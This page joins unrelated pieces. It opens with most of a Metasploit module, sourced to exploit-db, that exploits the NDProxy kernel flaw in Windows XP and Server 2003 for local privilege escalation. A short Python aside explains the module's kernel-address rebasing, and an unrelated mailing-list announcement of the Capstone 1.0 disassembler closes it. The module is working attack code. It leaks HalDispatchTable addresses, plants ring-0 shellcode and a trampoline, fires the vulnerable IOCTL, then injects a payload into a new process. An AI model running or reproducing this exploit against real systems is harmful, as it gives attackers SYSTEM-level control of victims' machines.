    vprint_good("Kernel module found: #{kernel_info[1]}")

    vprint_status("Getting a Kernel handle...")
    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
    kernel32_handle = kernel32_handle['return']
    if kernel32_handle == 0
      vprint_error("Failed to get a Kernel handle")
      return nil
    end
    vprint_good("Kernel handle acquired")

    vprint_status("Disclosing the HalDispatchTable...")
    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
    hal_dispatch_table = hal_dispatch_table['return']
    if hal_dispatch_table == 0
      vprint_error("Failed to disclose the HalDispatchTable")
      return nil
    end
    hal_dispatch_table -= kernel32_handle
    hal_dispatch_table += kernel_info[0]
    addresses["halDispatchTable"] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")

    vprint_status("Getting the hal.dll Base Address...")
    hal_info = find_sys_base("hal.dll")
    if hal_info.nil?
      vprint_error("Failed to disclose hal.dll Base Address")
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses["HaliQuerySystemInfo"] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")

    return addresses
  end

  def check
    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Detected
    end

    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end

    session.railgun.kernel32.CloseHandle(handle)

    os = sysinfo["OS"]
    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
    when /[2003|.net server].*service pack 2/i
      return Exploit::CheckCode::Appears
    when /windows xp/i
      return Exploit::CheckCode::Detected
    when /[2003|.net server]/i
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    my_target = nil
    if target.name =~ /Automatic/
      print_status("Detecting the target system...")
      os = sysinfo["OS"]
      if os =~ /windows xp.*service pack 3/i
        my_target = targets[1]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      end
    else
      my_target = target
    end

    if my_target.nil?
      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
    end

    print_status("Checking device...")
    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
    else
      print_good("\\\\.\\NDProxy found!")
    end

    print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary addresses for exploitation.
 Aborting.")
    else
      print_good("Addresses successfully disclosed.")
    end

    print_status("Storing the kernel stager on memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode(my_target)
    kernel_shell_address = 0x1000
    result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    else
      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
    end

    print_status("Storing the trampoline to the kernel stager on memory...")
    trampoline = "\x90" * 0x38       # nops
    trampoline << "\x68"             # push opcode
    trampoline << [0x1000].pack("V") # address to push
    trampoline << "\xc3"             # ret
    trampoline_addr = 0x1
    result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing trampoline on memory")
    else
      print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
    end

    print_status("Storing the IO Control buffer on memory...")
    buffer = "\x00" * 1024
    buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
    buffer[28, 4] = [0x34].pack("V")      # In order to trigger the vulnerable call
    buffer_addr = 0x0d0d0000
    result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
    else
      print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
    end

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    magic_ioctl = 0x8fff23c8 # Values taken from the exploit in the wild, see references
    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager through NtQueryIntervalProfile()...")
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end

    p = payload.encoded
    print_good("Exploitation successful! Creating a new process and launching payload...")

    new_pid = create_proc
    if new_pid.nil?
      print_warning("Unable to create a new process; maybe you're in a sandbox. If the current process has been elevated, try to migrate before executing a new process...")
      return
    end

    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
    if execute_shellcode(p, nil, new_pid)
      print_good("Enjoy")
    else
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Source: http://www.exploit-db.com/exploits/30392/
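The `disclose_addresses` routine in the module above resolves kernel symbols from user mode: it maps the kernel image into the process with `LoadLibraryExA`, resolves the symbol there with `GetProcAddress`, and then rebases the result onto the true kernel base reported by `EnumDeviceDrivers` (the relative virtual address is the same in both mappings). The arithmetic can be sketched in Python; the addresses below are hypothetical example values, not taken from a real system:

```python
def rebase(symbol_user: int, user_base: int, kernel_base: int) -> int:
    """Translate a symbol address from the user-mode mapping of a kernel
    module to its kernel-mode address: the RVA is mapping-independent."""
    rva = symbol_user - user_base  # offset of the symbol inside the image
    return kernel_base + rva

# Hypothetical example values:
user_base   = 0x77C00000  # as returned by LoadLibraryExA
symbol_user = 0x77C1ABCD  # as returned by GetProcAddress(..., "HalDispatchTable")
kernel_base = 0x804D7000  # as reported by EnumDeviceDrivers

print(hex(rebase(symbol_user, user_base, kernel_base)))  # 0x804f1bcd
```

This is exactly what the module does with `hal_dispatch_table -= kernel32_handle; hal_dispatch_table += kernel_info[0]`, since `LoadLibraryExA` returns the user-mode base as the module handle.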
  25. Capstone 1.0 disassembly framework release!

From: Nguyen Anh Quynh <aquynh () gmail com>
Date: Wed, 18 Dec 2013 12:42:20 +0800

Hi,

We are excited to announce version 1.0 of Capstone, the multi-arch, multi-platform disassembly framework you have been longing for!

Why is this engine unique? Capstone offers some unparalleled features:

- Supports all important hardware architectures: ARM, ARM64 (aka ARMv8), MIPS & X86.
- Clean/simple/lightweight/intuitive architecture-neutral API.
- Provides details on the disassembled instruction (called "decomposing" by others).
- Provides some semantics of the disassembled instruction, such as the list of implicit registers read & written.
- Implemented in pure C, with bindings for Python, Ruby, OCaml, C#, Java and Go available.
- Native support for Windows & *nix (including Mac OS X, Linux and *BSD platforms).
- Thread-safe by design.
- Distributed under the open source BSD license.

For further information, see our website at Capstone - Ultimate disassembly framework

Being an infant 1.0 release, Capstone might still be buggy or unable to handle many malware tricks yet. But give it a chance and report your findings, so we can fix the issues in the next versions.

Capstone is a very young project: the first line was written just 4 months ago. But we do hope that it will live a long life. Community support is critical for this little open source project!

We would like to show our gratitude to the beta testers for their bug reports & code contributions during the beta phase! Their invaluable help has been tremendous in getting us this far.

We would like to thank the LLVM project, which Capstone is based on. Without the almighty LLVM, Capstone would not exist!

Last but not least, big thanks go to Coseinc for its generous sponsorship of our project!

Thanks,
Quynh

Source: Full Disclosure: Capstone 1.0 disassembly framework release!